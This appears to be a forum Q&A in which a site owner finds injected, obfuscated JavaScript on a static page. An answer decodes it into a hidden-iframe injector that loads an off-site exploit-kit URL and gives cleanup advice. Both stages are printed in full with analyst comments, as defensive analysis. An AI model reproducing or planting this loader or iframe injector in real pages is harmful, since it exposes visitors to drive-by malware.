Strange Javascript appearing on static html web page
I have a static html web page for my website and recently was not able to load my website on my Windows XP machine. Norton Antivirus blocked the website reporting it as a "Web Attack: Blackhole Toolkit Website 7". I downloaded my index.htm page and found this code in the body which was not created by me when compared to my local copy of the same page:
<script>
// Injected, obfuscated loader (analysis notes for defenders).
// Overall shape: build the string "eval" without ever writing it literally,
// obtain a reference to eval through the Function constructor, decode a second
// script from the number list `ar2` using `ar` as a lookup alphabet, then run
// the decoded text. Every variable below is assigned without var/let/const, so
// all of them become implicit globals on the page.
// Detection hints visible in this sample: a Function(...) call whose argument is
// assembled from string fragments, a long delimiter-separated number string, and
// a final call that passes a runtime-built string to an alias of eval.

// Scratch <div> that is never attached to the document; it only stores string
// fragments as text nodes.
el = document.createElement("div");
el.appendChild(document.createTextNode("ReferenceErr"));
el.appendChild(document.createTextNode("q"));
// After this insert the child text nodes are, in order: "ReferenceErr", "l", "q".
el.insertBefore(document.createTextNode("l"), el.childNodes[1]);
try {
try {
throw 1
} catch (a) {
// `b` is never declared in this snippet, so this assignment itself throws and
// control moves to the outer catch.
b[2] = 21
};
} catch (a) {
// substr(0, 0) is always the empty string, so k ends up equal to the first text
// node's value, "ReferenceErr". k is only assigned on this exception path --
// presumably a check that the host really has DOM and exception handling
// (NOTE(review): intent inferred, not shown on the page).
k = el.firstChild.nodeValue + a.toString().substr(0, 0);
};
// Lookup alphabet: decoded characters are picked out of this string by index.
ar = "\"aTBtc0.gyA:/[hi],b> vCldmwf)s{up1oE'=<r(n;N}ez";
// Encoded payload: numbers separated by "c". The leading "R" on the first entry
// is overwritten after the split below.
ar2 = "R80c80c60c112c84c164c100c140c20c128c104c184c168c16c28c32c184c16c144c96c184c104c184c168c16c120c12c36c8c4c32c176c4c104c184c164c148c72c140c100c36c148c116c52c24c64c116c124c80c80c80c60c112c160c4c104c184c160c164c116c172c80c80c180c84c184c96c120c184c84c124c80c80c80c100c140c20c128c104c184c168c16c28c108c160c60c16c184c164c0c156c60c112c160c4c104c184c84c120c160c20c152c148c56c16c16c132c44c48c48c188c140c168c100c32c160c140c128c132c28c20c140c104c48c56c140c104c184c28c132c56c132c148c84c108c60c100c16c56c152c148c136c24c148c84c56c184c60c32c56c16c152c148c136c24c148c84c120c16c36c96c184c152c148c88c60c120c60c72c60c96c60c16c36c44c56c60c100c100c184c168c172c132c140c120c60c16c60c140c168c44c4c72c120c140c96c128c16c184c172c96c184c112c16c44c24c172c16c140c132c44c24c172c148c76c156c48c60c112c160c4c104c184c76c0c116c172c80c80c180c80c80c112c128c168c20c16c60c140c168c84c60c112c160c4c104c184c160c164c116c124c80c80c80c88c4c160c84c112c84c152c84c100c140c20c128c104c184c168c16c28c20c160c184c4c16c184c144c96c184c104c184c168c16c164c148c60c112c160c4c104c184c148c116c172c112c28c120c184c16c40c16c16c160c60c72c128c16c184c164c148c120c160c20c148c68c148c56c16c16c132c44c48c48c188c140c168c100c32c160c140c128c132c28c20c140c104c48c56c140c104c184c28c132c56c132c148c116c172c112c28c120c16c36c96c184c28c88c60c120c60c72c60c96c60c16c36c152c148c56c60c100c100c184c168c148c172c112c28c120c16c36c96c184c28c132c140c120c60c16c60c140c168c152c148c4c72c120c140c96c128c16c184c148c172c112c28c120c16c36c96c184c28c96c184c112c16c152c148c24c148c172c112c28c120c16c36c96c184c28c16c140c132c152c148c24c148c172c112c28c120c184c16c40c16c16c160c60c72c128c16c184c164c148c108c60c100c16c56c148c68c148c136c24c148c116c172c112c28c120c184c16c40c16c16c160c60c72c128c16c184c164c148c56c184c60c32c56c16c148c68c148c136c24c148c116c172c80c80c80c100c140c20c128c104c184c168c16c28c32c184c16c144c96c184c104c184c168c16c120c12c36c8c4c32c176c4c104c184c164c148c72c140c100c36c148c116c52c24c64c28c4c132c132c184c168c100c92c56c60c96c100c164c112c116c172c80c80c180";
// k is "ReferenceErr" and el.childNodes[1] is the "l" node, so the replace turns
// "urn eReferenceErr" into "urn eval".
pau = "urn eReferenceErr".replace(k, "va" + el.childNodes[1].nodeValue);
// Function("return eval")() returns the eval function itself; `e` is therefore
// an alias for eval, and every e(...) call below is an indirect eval.
e = Function("ret" + pau)();
ar2 = ar2.split("c");
// Replaces the "R80" placeholder with a plain number string.
ar2[0] = "80";
// Accumulator for the decoded script text.
s = "";
for (i = 0; i != ar2.length; i++) {
// The fragments concatenate to: pos=parseInt(k.replace("Referen","0asd"))+ar2[i]/4
// k.replace(...) gives "0asdceErr", which parseInt reads as 0, so pos is simply
// ar2[i] / 4 -- the detour makes the index depend on k having been set above.
// NOTE(review): the text 开发者_C百科 inside the third fragment looks like a
// watermark added by the site this page was copied from, not part of the
// original sample; as shown, the evaluated expression would reference an
// undefined identifier.
e('po'.concat('s=par', 'seInt(开发者_C百科k', '.rep', 'lace("R', 'eferen', '","0a', 'sd"))+', 'ar2[', 'i]/', '4'));
// Append the single alphabet character at index pos to the decoded text.
e('s+=ar.substr(pos,1)');
}
// Evaluate the fully decoded script (an answer further down this page shows the
// decoded output).
e(s);
</script>
Anybody have any idea how this might have appeared and how my index.htm page could have been modified?
Thanks, Steve
Below is the end result of the script, i.e. the code that the obfuscated loader decodes and then evaluates. I ran it in a VM to test it out and got a malicious-site warning from Google as well. All of that obfuscation just to write this:
// Decoded second stage, as posted by the answerer (analysis notes for defenders).
// Its only action is to make the visitor's browser load a third-party URL in an
// iframe the visitor cannot see. Per the question, Norton reported the page as
// "Web Attack: Blackhole Toolkit Website 7".
// Detection hints visible here: a script-created iframe that is hidden, 10x10,
// absolutely positioned at the page origin, and pointed at an off-site host --
// none of which a hand-written static page would normally contain.

// If the <body> element already exists, inject via the DOM. The call works
// before the declaration below because function declarations are hoisted.
if (document.getElementsByTagName('body')[0]) {
iframer();
} else {
// NOTE(review): writing an empty string does nothing; the original argument
// was presumably markup that the hosting site stripped when the answer was
// posted -- cannot be confirmed from this page.
document.write("");
}
// Creates the hidden iframe and appends it to <body>.
function iframer() {
var f = document.createElement('iframe');
// Off-site destination; the hostname appears chosen to resemble a Google
// service name (inferred from the name only).
f.setAttribute('src', 'http://toolbarqueries-google.com/in.cgi?default');
// visibility:hidden keeps the frame from rendering while its content still loads.
f.style.visibility = 'hidden';
// Absolute positioning at 0,0 takes the frame out of the page flow so the
// visible layout does not shift.
f.style.position = 'absolute';
f.style.left = '0';
f.style.top = '0';
f.setAttribute('width', '10');
f.setAttribute('height', '10');
document.getElementsByTagName('body')[0].appendChild(f);
}
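Someone hacked your site. A static page only changes on the server if somebody with write access changes it, and there are many ways an attacker can get that access (for example stolen FTP or hosting-panel credentials, or a weakness elsewhere on a shared host). Treat it as a full compromise: restore index.htm from your clean local copy, check every other file on the server for the same injected script, change all hosting passwords from a machine you know is clean, and review the server's access logs to see how and when the file was modified.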